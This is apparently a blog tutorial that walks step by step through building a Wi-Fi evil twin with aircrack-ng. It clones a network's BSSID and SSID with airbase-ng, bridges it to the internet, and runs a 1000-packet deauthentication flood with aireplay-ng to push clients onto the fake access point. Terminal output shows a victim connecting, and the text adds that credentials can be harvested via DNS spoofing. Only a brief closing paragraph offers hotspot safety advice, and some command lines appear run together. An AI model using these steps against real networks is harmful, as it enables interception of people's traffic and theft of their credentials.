How to Create an Evil Twin or Fake Access Point
Introduction
An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.
Devices connecting to a Wi-Fi network like laptops, tablets, and smart phones have no way to distinguish between two Wi-Fi networks with the same SSID name.
This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.
Enable Monitor Mode
The first step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.
airmon-ng start wlan0This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.
Locate the Target Wireless Network
The second step is to start scanning nearby wireless routers and locate the Wi-Fi network which you want to clone. Execute the following command:
airodump-ng wlan0mon
CH 6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net
BSSID STATION PWR Rate Lost Packets Probes
28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1 The wireless network I will be cloning in this tutorial is SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.
Create the Evil Twin
Once you’ve found the network which you wish to clone, run the following command in another terminal:
airbase-ng -a 28:EF:01:35:34:85 –e SkyNet -c 6 wlan0mon$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
21:39:29 Created tap interface at0
21:39:29 Trying to set MTU on at0 to 1500
21:39:29 Trying to set MTU on wlan0mon to 1800
21:39:29 Access Point with BSSID 28:EF:01:35:34:85 started.This command creates an Evil Twin network with the SSID name SkyNet, however, it will not be able to provide internet access yet.
Provide Internet Access to the Evil Twin
I will add the bridge interface, called fake, you can name it any way you like.
brctl addbr fakeNow add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).
brctl addif fake eth0
brctl addif fake at0Assign IP addresses to the interface and bring them up using ifconfig:
ifconfig at0 0.0.0.0 up
ifconfig fake upYou can take a look at the bridge network interface with ifconfig:
ifconfig
at0 Link encap:Ethernet HWaddr 74:85:2a
inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:540 (540.0 B) TX bytes:54845 (53.3 KiB)
eth0 Link encap:Ethernet HWaddr c8:bc:c8
inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::cabc:a6c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:640 errors:0 dropped:0 overruns:0 frame:0
TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.2 KiB)
Interrupt:17
fake Link encap:Ethernet HWaddr 74:85:2a
inet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80:::fe97:5b08/64 Scope:Link
inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:859 errors:0 dropped:0 overruns:0 frame:0
TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)Kick Wireless Clients from the Legitimate AP
The next step is to kick wireless clients off the legitimate AP, in my case, that’s SkyNet network. You can do this by using aireplay-ng.
aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0monThis command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.
As you can see in the output below, a client has associated with my evil twin. This information is found in the airebase-ng terminal (client 28:EF:01:23:46:68 associated).
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
14:50:56 Created tap interface at0
14:50:56 Trying to set MTU on at0 to 1500
14:50:56 Trying to set MTU on wlan5 to 1800
14:50:56 Access Point with BSSID 28:EF:01:35:34:85 started.
14:58:55 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
15:03:24 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"At this point, all the victim’s traffic is going through the attacker’s machine, he or she can capture sensitive information since it’s technically a Man-in-the-Middle attack.
The attacker can perform various attacks like DNS spoofing which redirects the victim to a cloned or fake login page. Once the victim tries to login, the hacker harvests the credentials.
Conclusion
Make sure that you are logging into a legitimate hotspot network and use hotspots for Web surfing only. Avoid making online purchases or any other financial transactions that require account numbers and passwords.
Also, if you see two identical network names, then perhaps you should avoid connecting to either one of those networks.
I hope you enjoyed this article. If you want to support my writing, I would really appreciate if you took a second to leave some claps and a follow! You can also buy me a coffee to fuel my next article.
Thank you!